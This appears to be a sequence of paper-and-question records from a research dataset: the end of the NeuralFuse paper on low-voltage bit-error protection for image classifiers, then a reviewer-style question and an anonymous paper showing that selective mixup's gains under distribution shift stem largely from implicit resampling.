\frac{Energy_{nominal\ voltage} - (Energy_{low-voltage-regime} + Energy_{NeuralFuse\ at\ nominal\ voltage})}{Energy_{nominal\ voltage}} \times 100\%. \] Table 2: The energy saving percentage (%) for different combinations of base models and Neural-Fuse. | Base Model | ConvL | ConvS | DeConvL | DeConvS | UNetL | UNetS | |------------|-------|-------|---------|---------|-------|-------| | ResNet18 | 19.0 | 29.1 | 21.2 | 27.5 | 24.0 | 28.9 | | ResNet50 | 25.4 | 29.9 | 26.4 | 29.2 | 27.7 | 29.9 | | VGG11 | 6.6 | 27.5 | 11.2 | 24.1 | 17.1 | 27.2 | | VGG16 | 17.1 | 28.9 | 19.7 | 27.0 | 23.0 | 28.7 | | VGG19 | 20.3 | 29.7 | 22.3 | 27.8 | 24.8 | 29.1 | Also, as shown in Figure 1(b), when utilizing ResNet18 as a base model, NeuralFuse can recover model accuracy by 20% ~ 49% while saving 19% ~ 29% energy. More results are in Appendix D and we have provided Multiply-Accumulate operations-based energy-saving results in Appendix E. 4.5 Model Size and Efficiency of NeuralFuse To provide a full performance characterization of NeuralFuse, we analyze the relationship between the final recovery of each base model and generators of varying parameter counts. The efficiency ratio is defined as the recover percentage in perturbed accuracy divided by the parameter count of NeuralFuse. We compare the efficiency ratio for all NeuralFuse generators (trained on CIFAR-10) in Table 3. The results show that UNet-based generators have better efficiency than both Convolution-based and Deconvolution-based ones per million parameters. 4.6 NeuralFuse on Reduced-Precision Quantization Here we explore the robustness of NeuralFuse to low-precision quantization on model weights. Uniform quantization is the de-facto method for quantizing model weights (Gholami et al., 2022). However, it is possible to cause an accuracy drop due to precision loss. As a bit-error-oriented protector, we seek to understand whether NeuralFuse could also make a recovery to mitigate the model’s accuracy drop in this scope. We conducted an experiment that uniformly quantized the model weights to Table 3: The efficiency ratio (%) for all NeuralFuse generators. | Base Model | B.E.R. | ConvL | ConvS | DeConvL | DeConvS | UNetL | UNetS | |------------|--------|-------|-------|---------|---------|-------|-------| | ResNet18 | 1% | 67.5 | 182 | 76.6 | 190.7 | 94.5 | 245.9 | | | 0.5% | 24.7 | 73.3 | 30.7 | 62.5 | 33.6 | 88.3 | | ResNet50 | 1% | 37.4 | 75.1 | 57.4 | 102.7 | 102.3 | 248.4 | | | 0.5% | 35.2 | 108.7 | 40.4 | 92.5 | 47.4 | 124.6 | | VGG11 | 1% | 62.3 | 212.9 | 69.5 | 165.8 | 92.0 | 251.7 | | | 0.5% | 32.3 | 96.3 | 35.8 | 77.2 | 38.9 | 100.7 | | VGG16 | 1% | 69.6 | 211.2 | 76.9 | 196.5 | 98.8 | 292.9 | | | 0.5% | 30.3 | 98.1 | 33.0 | 75.3 | 40.6 | 113 | | VGG19 | 1% | 57.6 | 147.5 | 65.5 | 141.6 | 95.4 | 250.8 | | | 0.5% | 33.0 | 91.0 | 37.5 | 70.2 | 43.1 | 106.4 | Figure 4: Reduced-precision accuracy We use GTSRB pre-trained ResNet18 as an example to evaluate two NeuralFuse generators (ConvL and UNetL, trained with 0.5% B.E.R.), and vary the precision $b$ from 8 bits to 2 bits (integer). The result is shown in Figure 4. We find that when $b > 3$ bits, NeuralFuse can take effect to recover the accuracy in both scenarios. When $b = 3$, while NeuralFuse can still handle the bit-error-free model (top panel), it exhibits a limited ability to recover the random bit-error case (bottom panel). We find the result encouraging because the observed robustness to reduced-precision inference is an emergent ability of NeuralFuse. That is, NeuralFuse was only trained with random bit errors, but it demonstrated high accuracy to unseen bit quantization errors. This experiment showcases NeuralFuse’s potential in protecting against accuracy drops caused by different sources of bit errors. More experimental results of different base models and datasets can be found in Appendix I. 4.7 Extended Analysis We highlight some key findings from the additional results in Appendix. In Appendix F, we compare NeuralFuse to the simple baseline of learning a universal input perturbation. We find that the baseline is much worse than NeuralFuse, which validates the necessity of adopting input-aware transformation for learning error-resistant data representations in low-voltage scenarios. In Appendix H, we find that ensemble training of white-box surrogate base models can further improve the transferability of NeuralFuse in the restricted-access setting. In Appendix J and Appendix K, we present visualization results of data embeddings and transformed inputs via NeuralFuse. In Appendix M, we show that NeuralFuse can further recover the accuracy of a base model trained with adversarial weight perturbation in the low-voltage setting. 5 Conclusion In this paper, we propose NeuralFuse, the first non-intrusive post-hoc protection module for model inference against bit errors induced by low voltage. NeuralFuse is particularly suited for practical machine deployment settings where access to the base model is limited or relaxed. The design of NeuralFuse includes a novel loss function and a new optimizer named EOPM to handle simulated randomness in perturbed models. Our comprehensive experimental results and analysis show that NeuralFuse can significantly recover test accuracy (by up to 57%) while simultaneously enjoying up to 24% reduction in memory access energy. Furthermore, NeuralFuse demonstrates high transferability (to access-constrained models), and versatility (e.g., robustness to low-precision quantization). Our results show that NeuralFuse provides significant improvements in mitigating the energy-accuracy tradeoff of neural network inference in low-voltage regimes and sheds new insights on green AI technology. Our future work includes extending our study to other neural network architectures and modalities, such as transformer-based language models. REFERENCES Anish Athalye, Logan Engstrom, Andrew Ilyas, and Kevin Kwok. Synthesizing robust adversarial examples. In *International Conference on Machine Learning (ICML)*, pp. 284–293. PMLR, 2018. Babak Ehteshami Bejnordi, Tijmen Blankevoort, and Max Welling. Batch-shaping for learning conditional channel gated networks. In *International Conference on Learning Representations (ICLR)*, 2020. Nandhini Chandramoorthy, Karthik Swaminathan, Martin Cochet, Arun Paidimarri, Schuyler Eldridge, Rajiv V. Joshi, Matthew M. Ziegler, Alper Buyuktosunoglu, and Pradip Bose. Resilient low voltage accelerators for high energy efficiency. In *2019 IEEE International Symposium on High Performance Computer Architecture (HPCA)*, pp. 147–158, 2019. doi: 10.1109/HPCA.2019.00034. Yu-Hsin Chen, Joel Emer, and Vivienne Sze. Eyeriss: A spatial architecture for energy-efficient dataflow for convolutional neural networks. *ACM SIGARCH computer architecture news*, 44(3): 367–379, 2016. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 248–255, 2009. doi: 10.1109/CVPR.2009.5206848. Shrikanth Ganapathy, John Kalamatianos, Keith Kasprak, and Steven Raasch. On characterizing near-threshold sram failures in finfet technology. In *2017 54th ACM/EDAC/IEEE Design Automation Conference (DAC)*, pp. 1–6, 2017. doi: 10.1145/3061639.3062292. Amir Gholami, Sehoon Kim, Zhen Dong, Zhewei Yao, Michael W Mahoney, and Kurt Keutzer. A survey of quantization methods for efficient neural network inference. In *Low-Power Computer Vision*, pp. 291–326. Chapman and Hall/CRC, 2022. Yunchao Gong, Liu Liu, Ming Yang, and Lubomir Bourdev. Compressing deep convolutional networks using vector quantization. *arXiv preprint arXiv:1412.6115*, 2014. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *2016 IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 770–778, 2016. doi: 10.1109/CVPR.2016.90. Zhizhong Huang, Jie Chen, Junping Zhang, and Hongming Shan. Learning representation for clustering via prototype scattering and positive sampling. *IEEE Transactions on Pattern Analysis and Machine Intelligence*, pp. 1–16, 2022. doi: 10.1109/TPAMI.2022.3216454. Sung Kim, Patrick Howe, Thierry Moreau, Armin Alaghi, Luis Ceze, and Visvesh Sathe. Matic: Learning around errors for efficient low-voltage neural network accelerators. In *2018 Design, Automation & Test in Europe Conference & Exhibition (DATE)*, pp. 1–6. IEEE, 2018. Skanda Koppula, Lois Orosa, A Giray Yağlıkçı, Roknoddin Azizi, Taha Shahroodi, Konstantinos Kanellopoulos, and Onur Mutlu. Eden: Enabling energy-efficient, high-performance deep neural network inference using approximate dram. In *Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture*, pp. 166–181, 2019. Alex Krizhevsky and Geoffrey Hinton. Learning multiple layers of features from tiny images. Technical report, University of Toronto, Toronto, Ontario, 2009. Seyed-Mohsen Moosavi-Dezfooli, Alhussein Fawzi, Omar Fawzi, and Pascal Frossard. Universal adversarial perturbations. In *Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 1765–1773, 2017. Tuan Anh Nguyen and Anh Tran. Input-aware dynamic backdoor attack. *Advances in Neural Information Processing Systems (NeurIPS)*, 33:3454–3464, 2020. Ozan Özdenizci and Robert Legenstein. Improving robustness against stealthy weight bit-flip attacks by output code matching. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 13388–13397, 2022.
NqQjoncEDR
What makes the difference in the sampling ratio between the selective sampling without mixup and resampling? Is this determined by the hyperparameter of mixup? When changing the lambda for the beta distribution of mixup, are similar results as Fig 15 hold?
SELECTIVE MIXUP HELPS WITH DISTRIBUTION SHIFTS, BUT NOT (ONLY) BECAUSE OF MIXUP Anonymous authors Paper under double-blind review ABSTRACT Context. Mixup is a highly successful technique to improve generalization of neural networks by augmenting the training data with combinations of random pairs. Selective mixup is a family of methods that apply mixup to specific pairs, e.g. only combining examples across classes or domains. These methods have claimed remarkable improvements on benchmarks with distribution shifts, but their mechanisms and limitations remain poorly understood. Findings. We examine an overlooked aspect of selective mixup that explains its success in a completely new light. We find that the non-random selection of pairs affects the training distribution and improve generalization by means completely unrelated to the mixing. For example in binary classification, mixup across classes implicitly resamples the data for a uniform class distribution — a classical solution to label shift. We show empirically that this implicit resampling explains much of the improvements in prior work. Theoretically, these results rely on a “regression toward the mean”, an accidental property that we identify in several datasets. Takeaways. We have found a new equivalence between two successful methods: selective mixup and resampling. We identify limits of the former, confirm the effectiveness of the latter, and find better combinations of their respective benefits. 1 INTRODUCTION Mixup and its variants are some of the few methods that improve generalization across tasks and modalities with no domain-specific information (Zhang et al., 2017). Standard mixup replaces training data with linear combinations of random pairs of examples, proving successful e.g. for image classification (Yun et al., 2019b), semantic segmentation (Islam et al., 2023), natural language processing (Verma et al., 2019), and speech processing (Meng et al., 2021). This paper focuses on scenarios of distribution shift and variants of mixup that improve out-of-distribution (OOD) generalization. We examine the family of methods that apply mixup on selected pairs of examples, which we refer to as selective mixup (Hwang et al., 2022; Li et al., 2023; Lu et al., 2022a; Palakkadavath et al., 2022; Tian et al., 2023; Xu et al., 2020; Yao et al., 2022b). Each method uses a predefined criterion\(^1\) for example combining examples across classes (Yao et al., 2022b) (Figure 1) or across domains (Xu et al., 2020; Li et al., 2023; Lu et al., 2022a). These simple heuristics have claimed remarkable improvements on benchmarks such as DomainBed (Gulrajani and Lopez-Paz, 2020), WILDS (Koh et al., 2021), and Wild-Time (Yao et al., 2022a). Despite impressive empirical performance, the theoretical mechanisms of selective mixup remain obscure. For example, the selection criteria in Yao et al. (2022b) include the selection of pairs of the same class/different domains but also the exact opposite. This raises questions: 1. What makes each selection criterion suitable to any specific dataset? 2. Are there multiple mechanisms responsible for the improvements with selective mixup? This paper presents surprising answers, highlighting an overlooked side effect of selective mixup. The non-random selection of pairs implicitly biases the training distribution and improve generalization by means completely unrelated to the mixing. We observe empirically that simply forming mini-batches with all instances of the selected pairs (without mixing them) often produces the same improvements as mixing them. This critical ablation was absent from prior studies. \(^1\)We focus on the basic implementation (Yao et al., 2022b) without modifications to the learning objective. Selective mixup is a family of methods that replace the training data with combined pairs of examples fulfilling a predefined criterion, e.g., pairs from different classes. An overlooked side effect is to modify the training distribution: here, sampling classes more uniformly. This is responsible for much of the observed improvements in OOD generalization. We also analyze theoretically the resampling induced by different selection criteria. We find that conditioning on a “different attribute” (e.g., combining examples across classes or domains) brings the training distribution of this attribute closer to a uniform one. Consequently, the imbalances in the data often “regress toward the mean” with selective mixup. We verify empirically that several datasets do indeed shift toward a uniform class distribution in their test split (see Figure 1). We also find remarkable correlation between improvements in performance and the reduction in divergence of training/test distributions due to selective mixup. This also predicts a new failure mode of selective mixup when the above property does not hold (see Appendix C). Our contributions are summarized as follows. - We point out an overlooked resampling effect when applying selective mixup (Section 3). - We show theoretically that certain selection criteria induce a bias in the distribution of features and/or classes equivalent to a “regression toward the mean” (Theorem 3.1). In binary classification for example, selecting pairs across classes is equivalent to sampling uniformly over classes, the standard approach to address label shift and imbalanced data. - We verify empirically that multiple datasets indeed contain a regression toward a uniform class distribution across training and test splits (Section 4.6). We also find that improvements from selective mixup correlate with reductions in divergence of training/test distributions over labels and/or covariates. This strongly suggests that resampling is the main driver for these improvements. - We compare many selection criteria and resampling baselines on five datasets. In all cases, improvements with selective mixup are partly or fully explained by resampling effects (Section 4). The implications for future research are summarized as follows. - We connect two areas of the literature by showing that selective mixup is sometimes equivalent to resampling, a classical strategy for distribution shifts (Garg et al., 2023; Idrissi et al., 2022). This hints at possible benefits from advanced methods for label shift and domain adaptation on benchmarks with distribution shifts. - The resampling explains why different criteria in selective mixup benefit different datasets: they affect distributions of features and/or labels thus addressing covariate/label shift. - This explanation highlights the risk of overfitting to the benchmarks: much of the improvements rely on the accidental “regression toward the mean” in the datasets examined. 2 BACKGROUND: MIXUP AND SELECTIVE MIXUP Notations. We consider a classification model $f_\theta : \mathbb{R}^d \rightarrow [0, 1]^C$ of learned parameters $\theta$. It maps an input vector $x \in \mathbb{R}^d$ to a vector $y$ of scores over $C$ classes. The training data is typically a set of labeled examples $D = \{(x_i, y_i, d_i)\}_{i=1}^n$ where $y_i$ are one-hot vectors encoding ground-truth labels, and $d_i \in \mathbb{N}$ are optional discrete domain indices. Domain labels are available e.g., in datasets with different image styles (Li et al., 2017) or collected over different time periods (Koh et al., 2021). Training with ERM. Standard empirical risk minimization (ERM) optimizes the model’s parameters for $\min_\theta R(f_\theta, D)$. The expected training risk for a chosen loss function $L$ is: $$R(f_\theta, D) = \mathbb{E}_{(x, y) \in D} L(f_\theta(x), y).$$ An empirical estimate is obtained with an arithmetic mean over instances of the dataset $D$. Training with mixup. Standard mixup essentially replaces training examples with linear combinations of random pairs in both input and label space. We formalize it by redefining the training risk: $$R_{\text{mixup}}(f_\theta, D) = \mathbb{E}_{(x,y) \in D} L(f(cx + (1-c)\tilde{x}, cy + (1-c)\tilde{y}))$$ with mixing coefficients $c \sim B(2, 2)$ and paired examples $(\tilde{x}, \tilde{y}) \sim D$. The expectation is approximated by sampling coefficients and pairs at every training iteration. Selective mixup. While standard mixup combines random pairs, selective mixup only combines pairs that fulfill a predefined criterion. To select these pairs, the method starts with the original data $D$, then for every $(x, y, d) \in D$ it selects a $(\tilde{x}, \tilde{y}, \tilde{d}) \in D$ such that they fulfill the criterion represented by the predicate $\text{Paired}(\cdot, \cdot)$. For example, the criterion "same class, different domain" ("intra-label LISA" in [Yao et al., 2022]) is implemented as: $$\text{Paired}((x_i, y_i, d_i), (\tilde{x}_i, \tilde{y}_i, \tilde{d}_i)) = \text{true iff } (\tilde{y} = y) \land (\tilde{d} \neq d) \quad (\text{same class, diff. domain})$$ Other examples: - $$\text{Paired}((x_i, y_i, d_i), (\tilde{x}_i, \tilde{y}_i, \tilde{d}_i)) = \text{true iff } (\tilde{y} \neq y) \quad (\text{different class})$$ - $$\text{Paired}((x_i, y_i, d_i), (\tilde{x}_i, \tilde{y}_i, \tilde{d}_i)) = \text{true iff } (\tilde{d} = d) \quad (\text{same domain})$$ 3 SELECTIVE MIXUP MODIFIES THE TRAINING DISTRIBUTION The new claims of this paper comprise two parts. 1. Estimating the training risk with selective mixup (Eq. 2) uses a different sampling of examples from $D$ than ERM (Eq. 1). We demonstrate this theoretically in this section. 2. We hypothesize that this different sampling of training examples influences the generalization properties of the learned model, regardless of the mixing operation. We verify this empirically in Section 4 using ablations of selective mixup that omit the mixing operation — a critical baseline absent from prior studies. Training distribution. This distribution refers to the examples sampled from $D$ to estimate the training risk (Eq. 1 or 2) — whether these are then mixed or not. The following discussion focuses on distributions over classes ($y$) but analogous arguments apply to covariates ($x$) and domains ($d$). With ERM, the training distribution equals the dataset distribution because the expectation in Eq. 1 is over uniform samples of $D$. We obtain an empirical estimate by averaging all one-hot labels, giving the vector of discrete probabilities $p_Y(D) = \oplus_{(x,y) \in D} y / |D|$ where $\oplus$ is the element-wise sum. With selective mixup, evaluating the risk (Eq. 2) requires pairs of samples. The first element of a pair is sampled uniformly, yielding the same $p_Y(D)$ as ERM. The second element is selected as described above, using the first element and one chosen predicate $\text{Paired}(\cdot, \cdot)$ e.g. from (4a–4c). For our analysis, we denote these “second elements” of the pairs as the virtual data: $$\tilde{D} = \{(\tilde{x}_i, \tilde{y}_i, \tilde{d}_i) \sim D : \text{Paired}((x_i, y_i, d_i), (\tilde{x}_i, \tilde{y}_i, \tilde{d}_i)) = \text{true}, \forall i = 1, \ldots, |D|\}.$$ We can now analyze the overall training distribution of selective mixup. An empirical estimate is obtained by combining the distributions resulting from the two elements of the pairs, which gives the vector $p_Y(D \cup \tilde{D}) = (p_Y(D) \oplus p_Y(\tilde{D})) / 2$. Regression toward the mean. With the criterion "same class", it is obvious that $p_Y(\tilde{D}) = p_Y(D)$. Therefore these variants of selective mixup are not concerned with resampling effects. In contrast, the criteria "different class" or "different domain" do bias the sampling. In the case of binary classification, we have $p_Y(\tilde{D}) = 1 - p_Y(D)$ and therefore $p_Y(D \cup \tilde{D})$ is uniform. This means that selective mixup with the "different class" criterion has the side effect of balancing the training distribution of classes, a classical mitigation of class imbalance ([Japkowicz, 2000; Kubat et al., 1997]). For multiple classes, we have a more general result. Theorem 3.1. Given a dataset $D = \{(x_i, y_i)\}_i$ and paired data $\tilde{D}$ sampled according to the "different class" criterion, i.e. $\tilde{D} = \{(\tilde{x}_i, \tilde{y}_i) \sim D \text{ s.t. } \tilde{y}_i \neq y_i\}$, then the distribution of classes in $D \cup \tilde{D}$ is... more uniform than in $D$. Formally, the entropy $\mathbb{H}(p_Y(D)) \leq \mathbb{H}(p_Y(D \cup \tilde{D}))$. Proof: see Appendix D. Theorem 3.1 readily extends in two ways. First, the same effect also results from the different domain criterion: if each domain contains a different class distribution, the resampling from this criterion averages them out, yielding a more uniform aggregated training distribution. Second, this averaging applies not only to class labels ($y$) but also covariates ($x$). An analysis using distributions is ill-suited but the mechanism similarly affects the sampling of covariates when training with selective mixup. When does one benefit from the resampling (regardless of mixup)? The above results mean that selective mixup can implicitly reduce imbalances (a.k.a. biases) in the training data. When these are not spurious and also exist in the test data, the effect on predictive performance could be detrimental. We expect benefits (verified in Section 4) on datasets with distribution shifts. By definition, their training/test splits contain different imbalances. Softening imbalances in the training data is then likely to bring the training and test distributions closer, in particular with extreme shifts such as the complete reversal of a spurious correlation (e.g. waterbirds dataset, see Section 4.1). We also expect benefits on worst-group metrics (e.g. civilComments dataset, see Section 4.4). The challenge in these datasets comes from the imbalance of class/domain combinations. Prior work has indeed shown that balancing is beneficial (Idrissi et al., 2022; Sagawa et al., 2019). 4 EXPERIMENTS We performed a large number of experiments to understand the contribution of the different effects of selective mixup and other resampling baselines (complete results in Appendix B). Datasets. We focus on five datasets that previously showed improvements with selective mixup. We selected them to cover a range of modalities (vision, NLP, tabular), settings (binary, multiclass), and types of shifts (covariate, label, and subpopulation shifts). - **Waterbirds** (Sagawa et al., 2019) is a popular artificial dataset used to study distribution shifts. The task is to classify images of birds into two types. The image backgrounds are also of two types, and the correlation between birds and backgrounds is reversed across the training and test splits. The type of background in each image serves as its domain label. - **CivilComments** (Koh et al., 2021) is a widely-used dataset of online text comments to be classified as toxic or not. Each example is labeled with a topical attribute (e.g. Christian, male, LGBT, etc.) that is spuriously associated with ground truth labels in the training data. These attributes serve as domain labels. The target metric is the worst-group accuracy where the groups correspond to all toxicity/attribute combinations. - **Wild-Time Yearbook** (Yao et al., 2022a) contains yearbook portraits to be classified as male or female. It is part of the Wild-Time benchmark, which is a collection of real-world datasets captured over time. Each example belongs to a discrete time period that serves as its domain label. Distinct time periods are assigned to the training and OOD test splits (see Figure 10). - **Wild-Time arXiv** (Yao et al., 2022a) contains titles of arXiv preprints. The task is to predict each paper’s category among 172 classes. Time periods serve as domain labels. - **Wild-Time MIMIC-Readmission** (Yao et al., 2022a) contains hospital records (sequences of codes representing diagnoses and treatments) to be classified into two classes. The positive class indicates the readmission of the patient at the hospital within 15 days. Time periods serve as domain labels. Methods. We train standard architectures suited to each dataset with the methods below (details in Appendix A). We perform early stopping i.e. recording metrics for each run at the epoch of highest ID or worst-group validation performance (for Wild-Time and waterbirds/civilComments datasets respectively). We plot average metrics in bar charts over 9 different seeds with error bars representing ± one standard deviation. ERM and vanilla mixup are the standard baselines. Baseline resampling uses training examples with equal probability from each class, domain, or combinations thereof as in Idrissi et al. (2022); Sagawa et al. (2019). Selective mixup (■) includes all possible selection criteria based on classes and domains. We avoid ambiguous terminology from earlier works because of inconsistent usage (e.g. “intra-label LISA” means “different domain” in Koh et al. (2021) but not in Yao et al. (2022a)). Selective sampling (□) is a novel ablation of selective mixup where the selected pairs are not mixed, but the instances are appended one after another in the mini-batch. Half are dropped at random to keep the mini-batch size identical to the other methods. Therefore any difference between selective sampling and ERM is attributable only to resampling effects. We also include novel combinations (■) of sampling and mixup. 4.1 RESULTS ON THE waterbirds DATASET The target metric for this dataset is the worst-group accuracy, with groups defined as the four class/domain combinations. The two difficulties are (1) a class imbalance (77/23%) and (2) a correlation shift (spurious class/domain association reversed at test time). See discussion in Figure 2. ![Figure 2: Main results on waterbirds.](image) We first observe that vanilla mixup is detrimental compared to ERM. Resampling with uniform class/domain combinations is hugely beneficial, for the reasons explained in Figure 3. The ranking of various criteria for selective sampling is similar whether with or without mixup. Most interestingly, the best criterion performs similarly, but no better than the best resampling. The excellent performance of the best version of selective mixup is here entirely due to resampling. The efficacy of resampling on this dataset is not a new finding (Idrissi et al., 2022; Sagawa et al., 2019). What is new is its equivalence with the best variant of selective mixup. Figure 3 further supports this claim by comparing proportions of classes and domains sampled by each method. ![Figure 3: The sampling ratios of each class/domain clearly explain the performance of the best methods (waterbirds).](image) Resampling uniform combinations gives them all equal weights, just like the worst-group target metric. Selective mixup with same domain/diff. class also gives equal weights to the classes, while breaking the spurious pattern between groups and classes, unlike any other criterion. 4.2 RESULTS ON THE yearbook DATASET The difficulty of this dataset comes from a slight class imbalance and the presence of covariate/label shift (see Figure 10). The test split contains several domains (time periods). The target metric is the worst-domain accuracy. Figure 4 shows that vanilla mixup is slightly detrimental compared to ERM. Resampling for uniform classes gives a clear improvement because of the class imbalance. With selective sampling (no mixup), the only criteria that improve over ERM contain “different class”. This is expected because this criterion implicitly resamples for a uniform class distribution. To investigate whether some of the improvements are due to resampling, we measure the divergence between training and test distributions of classes and covariates (details in Appendix A). Figure 5 shows first that there is a clear variation among different criteria (● blue dots) i.e. some bring the training/test distributions closer to one another. Second, there is a remarkable correlation between the test accuracy and the divergence, on both classes and covariates. This means that resampling effects do occur and also play a part in the best variants of selective mixup. Finally, the improvements from simple resampling and the best variant of selective mixup suggest a new combination. We train a model with uniform class sampling and selective mixup using the --- 3 As expected, the correlation is reversed for the first two test domains in Figure 5 since they are even further from a uniform class distribution than the average of the training data, as seen in Figure 10. Figure 4: Main results on yearbook. With selective mixup, the “different class” criterion is not useful, but “same class” performs significantly better than ERM. Since this criterion alone does not have resampling effects, it indicates a genuine benefit from mixup restricted to pairs of the same class. Figure 5: Different selection criteria (●) modify the distribution of both covariates and labels (upper and lower rows). The resulting reductions in divergence between training and test distributions correlate remarkably well with test performance. This confirms the contribution of resampling to the overall performance of selective mixup. “same class” criterion, and obtain performance superior to all existing results (last row in Figure 5). This confirms the complementarity of the effects of resampling and within-class selective mixup. 4.3 Results on the arXiv Dataset This dataset has difficulties similar to yearbook and also many more classes (172). Simple resampling for uniform classes is very bad (literally off the chart in Figure 6) because it overcorrects the imbalance (the test distribution being closer to the training than to a uniform one). Uniform domains is much better since its effect is similar but milder. All variants of selective mixup (■) perform very well, but they improve over ERM even without mixup (●). And the selection criteria rank similarly with or without mixup, suggesting that parts of the improvements of selective mixup is due to the resampling. Given that vanilla mixup also clearly improves over ERM, the performance of selective mixup is explained by cumulative effects of vanilla mixup and resampling effects. This also suggests new combinations of methods (▲) among which we find one version marginally better than the best variant of selective mixup (last row). 4.4 Results on the civilComments Dataset This dataset mimics a subpopulation shift because the worst-group metric requires high accuracy on classes and domains under-represented in the training data. It also contains an implicit correlation shift because any class/domain association (e.g. “Christian” comments labeled as toxic more often than not) becomes spurious when evaluating individual class/domain combinations. 4.5 Results on the MIMIC-Readmission Dataset This dataset contains a class imbalance (about 78/22% in training data), label shift (the distribution being more balanced in the test split), and possibly covariate shift. It is unclear whether the task is causal or anticausal (labels causing the features) because the inputs contain both diagnoses and treatments. The target metric is the area under the ROC curve (AUROC) which gives equal importance to both classes. We report the worst-domain AUROC, i.e. the lowest value across test time periods. Vanilla mixup performs a bit better than ERM. Because of the class imbalance, resampling for uniform classes also improves ERM. As expected, this is perfectly equivalent to the selective sampling criterion “diffClass” and they perform therefore equally well. Adding mixup is yet a bit better, which suggests again that the performance of selective mixup is merely the result of the independent effects of vanilla mixup and resampling. We further verify this explanation with the novel combination of To investigate the contribution of resampling, we measure the divergence between training/test class distributions and plot them against the test accuracy (Figure 7). We observe a strong correlation across methods. Mixup essentially offsets the performance by a constant factor. This suggests again the independence of the effects of mixup and resampling. The resampling baselines (●) also roughly agree with a linear fit to the “selective sampling” points. We therefore hypothesize that all these methods are mostly addressing label shift. We verify this hypothesis with the remarkable fit of an additional point (▲) of a model trained by resampling according to the test set class distribution, i.e. cheating. It represents an upper bound that might be achievable in future work with methods for label shift (Azizzadenesheli et al., 2019; Lipton et al., 2018). We replicated these observations on every test domain of this dataset (Figure 15 in the appendix). For the above reasons, it makes sense that resampling for uniform classes or combinations greatly improves performance, as shown in prior work (Idrissi et al., 2022). With selective mixup (■), some criterion (same domain/diff. class) performs clearly above all others. But it works even better without mixup! (▲) Among many other variations, none surpasses the uniform-combinations baseline. simple resampling and vanilla mixup, and observe almost no difference whether the mixing operation is performed or not (last two rows in Figure 9). To further support the claim that these methods mostly address label shift, we report in Table 1 the proportion of the majority class in the training and test data. We observe that the distribution sampled by the best training methods brings it much closer to that of the test data. | Proportion of majority class (%) | | |---------------------------------|-------| | In the dataset (training) | 78.2 | | In the dataset (validation) | 77.8 | | In the dataset (OOD test) | **66.5** | | Sampled by different training methods | | |--------------------------------------|-------| | Resampling (uniform classes) | 50.0 | | Diff. domain + diff. class | 50.0 | | Diff. class | 50.1 | | Same domain + Diff. class | 49.9 | | Resampling (uniform cl.) + concatenated pairs | **64.3** | | Resampling (uniform cl.) + vanilla mixup | **64.3** | Table 1: The performance of the various methods on MIMIC-Readmission is explained by their correction of a class imbalance. The best training methods (boxed numbers) sample the majority class in a proportion much closer to that of the test data. 4.6 Evidence of a “Regression toward the Mean” in the Data We hypothesized in Section 3 that resampling helps because of a “regression toward the mean” between training and test splits. We now check for this property and find indeed a shift toward uniform class distributions in all datasets studied. For the Wild-Time datasets, we plot in Figure 10 the ratio of the minority class (for binary tasks: yearbook, MIMIC) and class distribution entropy (for the multiclass task: arXiv). Finding this property agrees with the proposed explanation and with the fact that we selected all three datasets because they previously showed improvements with selective mixup in Yao et al. (2022a). The shift toward uniformity also holds in waterbirds and civilComments, artificially through the worst-group metric. The training data contains imbalanced groups (class/domain combinations) while the worst-group accuracy gives uniform importance to all groups. Figure 10: The class distribution shifts toward uniformity in these Wild-Time datasets. This agrees with the explanation that the benefits from resampling rely on a “regression toward the mean”. 5 Related Work Mixup and variants. Mixup was originally introduced in Zhang et al. (2017), and numerous variants followed (Cao et al., 2022). Many propose modality-specific mixing operations: CutMix (Yun et al., 2019a) replaces linear combinations with collages of image patches, Fmix (Harris et al., 2020) combines image regions based on frequency contents, AlignMixup (Venkataramanan et al., 2022) combines images after spatial alignment. Manifold-mixup (Verma et al., 2019) replaces the mixing in input space with the mixing of learned representations, making it applicable to text embeddings. **Mixup for OOD generalization.** Mixup has been integrated into existing techniques for domain adaptation (DomainMix (Xu et al., 2020)), domain generalization (FIXED (Lu et al., 2022b)), and with meta learning (RegMixup (Pinto et al., 2022)). This paper focuses on variants we call “selective mixup” that use non-uniform sampling of the pairs of mixed examples. LISA (Yao et al., 2022b) proposes two heuristics, same-class/different-domain and vice versa, used in proportions tuned by cross-validation on each dataset. Palakkadavath et al. (2022) use same-class pairs and an additional objective to encourage invariance of the representations to the mixing. CIFair (Tian et al., 2023) uses same-class pairs with a contrastive objective to improve algorithmic fairness. SelecMix (Hwang et al., 2022) proposes a selection heuristic to handle biased training data: same class/different biased attribute, or vice versa. DomainMix (Xu et al., 2020) uses different-domain pairs for domain adaptation. DRE (Li et al., 2023) uses same-class/different-domain pairs and regularize their Grad-CAM explanations to improve OOD generalization. SDMix (Lu et al., 2022a) applies mixup on examples from different domains with other improvements to improve cross-domain generalization for activity recognition. **Explaining the benefits of mixup** has invoked regularization (Zhang et al., 2020) and augmentation (Kimura, 2021) effects, the introduction of label noise (Liu et al., 2023), and the learning of rare features (Zou et al., 2023). These works focus on the mixing and in-domain generalization, whereas we focus on the selection and OOD generalization. **Training on resampled data.** We find that selective mixup is sometimes equivalent to training on resampled or reweighted data. Both are standard tools to handle distribution shifts in a domain adaptation setting (Japkowicz, 2000; Kubat et al., 1997) and are also known as importance-weighted empirical risk minimization (IW-ERM) (Shimodaira, 2000; Gretton et al., 2009). For covariate shifts, IW-ERM assigns each training point $x$ of label $y$ a weight equal to the likelihood ratio $\frac{p_{\text{target}}(x)}{p_{\text{source}}(x)}$, and for label shifts, $\frac{p_{\text{target}}(y)}{p_{\text{source}}(y)}$ (Azizzadenesheli et al., 2019; Lipton et al., 2018). Several works recently showed that reweighting and resampling are competitive with the state of the art in various OOD (Idrissi et al., 2022; Park et al., 2022; Perrett et al., 2023; Sagawa et al., 2019) and label-shift settings (Garg et al., 2023). ### 6 CONCLUSIONS AND OPEN QUESTIONS **Conclusions.** This paper helps understand selective mixup, which is one of the most successful and general methods for distribution shifts. We showed unambiguously that much of the improvements were actually unrelated to the mixing operation and could be obtained with much 